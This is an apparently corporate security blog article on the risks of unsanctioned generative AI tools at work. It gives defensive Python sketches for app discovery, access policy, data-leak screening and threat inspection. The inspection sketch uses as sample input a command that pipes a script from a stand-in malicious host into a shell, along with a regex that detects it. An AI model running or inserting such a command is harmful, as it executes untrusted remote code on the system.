Today, there are thousands of Generative AI (GenAI) tools available on the market, with dozens of new AI applications launched every month. The truth is, more than half of your employees are likely already using these tools to increase productivity at work, and that adoption is expected to grow as more AI apps become available for more use cases.
The problem is that most of these third-party GenAI apps have not been vetted or approved for use at work, which exposes companies to serious risks. There’s a reason IT and InfoSec teams vet and approve the third-party applications used within their company’s ecosystem of technologies – they need to understand which apps are in use, whether they are safe, and what sensitive company data, if any, is making its way into them. They also consider (among many other things) how the app developer handles issues such as vulnerabilities, and what controls are in place to restrict access to only what employees need to do their jobs.
The adoption of unsanctioned GenAI applications can lead to a broad range of cybersecurity issues, from data leakage to malware. That’s because your company doesn’t know who is using what apps, what sensitive information is going into them, and what’s happening to that information once it’s there. And because not all applications are built to suitable enterprise standards for security, they can also serve malicious links and act as entryways for attackers to infiltrate a company’s network, giving them access to your systems and data. All of these issues can lead to regulatory compliance violations, sensitive data exposure, IP theft, operational disruption and financial losses. While these apps offer enormous productivity potential, adopting them without proper security carries serious risks and consequences.
Take for example:
Marketing teams using an unsanctioned AI application to generate amazing image and video content. What happens if the team loads sensitive information into the app and the details of your confidential product launch leak? Not the kind of “viral” you were looking for.
Project managers using AI-powered note-taking apps to transcribe meetings and provide useful summaries. But what happens when the notes captured include a confidential discussion about this quarter’s financial results ahead of the earnings announcement?
Developers using copilots and code optimization services to build products faster. But what if optimized code returned from a compromised application includes malicious scripts?
These are just a few of the ways that well-intentioned use of GenAI results in an unintentional increase in risk. But blocking these technologies may limit your organization’s ability to gain a competitive edge, so that isn’t the answer either. Companies can, and should, take the time to consider how they can empower their employees to use these applications securely. Here are a few considerations:
Visibility – You can’t protect what you don’t know about. One of the biggest challenges unsanctioned apps create for IT teams is that incidents involving them are hard to spot and respond to promptly, which increases the potential for security breaches. Every enterprise must monitor the use of third-party GenAI apps and understand the specific risks associated with each tool. Building on that understanding of which tools are in use, IT teams need visibility into what data is flowing into and out of corporate systems. The same visibility helps ensure that a breach can be detected and remediated quickly.
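To make the discovery step concrete, here is a minimal sketch of how GenAI usage could be inventoried from egress traffic records you may already collect; the record fields and the domain list are illustrative assumptions, not any particular product’s schema.

```python
# A minimal sketch of GenAI-app discovery from egress traffic records.
# The field names and domain list are illustrative assumptions.
from collections import Counter

GENAI_DOMAINS = {"chat.example-ai.com", "notes.example-ai.app"}  # hypothetical app domains

def inventory_genai_usage(records: list[dict]) -> Counter:
    """Count requests per (user, GenAI domain) from proxy or firewall records."""
    usage = Counter()
    for record in records:  # assumed fields: "user", "dest_host"
        if record["dest_host"] in GENAI_DOMAINS:
            usage[(record["user"], record["dest_host"])] += 1
    return usage

sample = [
    {"user": "alice", "dest_host": "chat.example-ai.com"},
    {"user": "alice", "dest_host": "intranet.corp.local"},
    {"user": "bob", "dest_host": "notes.example-ai.app"},
]
for (user, host), hits in inventory_genai_usage(sample).most_common():
    print(f"{user} -> {host}: {hits} request(s)")
```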
Control – IT teams need the ability to make an informed decision on whether to block, allow or limit access to third-party GenAI apps, either on a per-application basis or through risk-based or categorical controls. For example, you might want to block all access to code optimization tools for all employees but allow developers to access the third-party optimization tool that your information security team has assessed and sanctioned for internal use.
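As a rough illustration of that kind of policy decision, the sketch below evaluates a block/allow verdict per application and category; the app names, categories and policy table are hypothetical examples, not a real policy engine.

```python
# A minimal sketch of per-application and category-based access decisions.
# App names, categories and the policy table are hypothetical.
from dataclasses import dataclass

@dataclass(frozen=True)
class App:
    name: str
    category: str      # e.g. "code-optimization", "note-taking"
    sanctioned: bool   # assessed and approved by InfoSec

POLICY = {
    # category: (default action, groups allowed to use sanctioned apps in it)
    "code-optimization": ("block", {"developers"}),
    "note-taking": ("allow", set()),
}

def decide(app: App, user_groups: set[str]) -> str:
    default, allowed_groups = POLICY.get(app.category, ("block", set()))
    if app.sanctioned and user_groups & allowed_groups:
        return "allow"
    return default

# Block the unsanctioned tool for everyone; allow the vetted one for developers.
print(decide(App("FastOptimize", "code-optimization", False), {"developers"}))   # block
print(decide(App("VettedOptimizer", "code-optimization", True), {"developers"})) # allow
```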
Data Security – Are your teams sharing sensitive data with the apps? IT teams need to prevent sensitive data from leaking in order to protect it against misuse and theft. This is especially important if your company is regulated or subject to data sovereignty laws. In practice, this means monitoring the data being sent to GenAI apps, and then leveraging technical controls to ensure that sensitive or protected data, such as personally identifiable information or intellectual property, isn’t sent to these applications.
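A simplified sketch of such an outbound check might look like the following; the patterns are deliberately naive placeholders, since real data loss prevention tooling uses far richer detection than a few regular expressions.

```python
# A minimal sketch of an outbound check on prompts bound for a GenAI app.
# The patterns are simple illustrations, not production-grade DLP rules.
import re

SENSITIVE_PATTERNS = {
    "ssn": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
    "credit_card": re.compile(r"\b(?:\d[ -]?){13,16}\b"),
    "internal_marker": re.compile(r"\bCONFIDENTIAL\b", re.IGNORECASE),
}

def screen_prompt(prompt: str) -> list[str]:
    """Return the names of sensitive-data patterns found in the prompt."""
    return [name for name, pattern in SENSITIVE_PATTERNS.items() if pattern.search(prompt)]

prompt = "Summarize the CONFIDENTIAL Q3 launch plan for customer 123-45-6789."
findings = screen_prompt(prompt)
if findings:
    print(f"Blocked: prompt contains {', '.join(findings)}")  # block or redact before sending
else:
    print("Prompt allowed")
```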
Threat prevention – Exploits and vulnerabilities can lurk beneath the surface of the GenAI tools your teams use. Given how quickly many of these tools have been developed and brought to market, you often don’t know whether the underlying model was built on compromised or corrupted components, trained on incorrect or malicious data, or is subject to a broad range of AI-specific vulnerabilities. It is a recommended best practice to monitor and inspect the data flowing from these applications into your organization for malicious or suspicious activity.
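As a toy illustration of inspecting what comes back from these tools, the sketch below flags links to a hypothetical blocklisted host and an obvious download-and-execute pattern in returned code; a production control would rely on real threat intelligence feeds and content scanning rather than a hard-coded list.

```python
# A minimal sketch of inspecting content returned by a GenAI app before it is used.
# The blocklist and heuristics are illustrative stand-ins for real threat intelligence.
import re

KNOWN_BAD_HOSTS = {"malicious.example.net"}  # hypothetical blocklist
URL_RE = re.compile(r"https?://([^/\s]+)", re.IGNORECASE)

def inspect_response(text: str) -> list[str]:
    """Flag links to known-bad hosts and obvious script injection in returned content."""
    findings = []
    for host in URL_RE.findall(text):
        if host.lower() in KNOWN_BAD_HOSTS:
            findings.append(f"link to blocklisted host: {host}")
    if re.search(r"curl\s+[^|]+\|\s*(sh|bash)", text):
        findings.append("pipes a remote download straight into a shell")
    return findings

snippet = "# optimized build step\ncurl https://malicious.example.net/x.sh | bash"
for finding in inspect_response(snippet):
    print("Suspicious:", finding)
```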
While AI tools bring incredible potential to maximize employee productivity and enable your organization to grow its top line while improving the bottom line, they also harbor newer and more complex risks than we’ve seen before. It’s on business leaders and their IT teams to empower their workforce to use AI tools confidently while ensuring they are protected with awareness, visibility, controls, data protection and threat prevention. Once your security teams know what’s being used and how, they can prevent sensitive data leaks and protect against the threats lurking inside insecure or compromised AI platforms.
This article originally appeared on Forbes.
The post The Hidden AI Risk Lurking In Your Business appeared first on Palo Alto Networks Blog.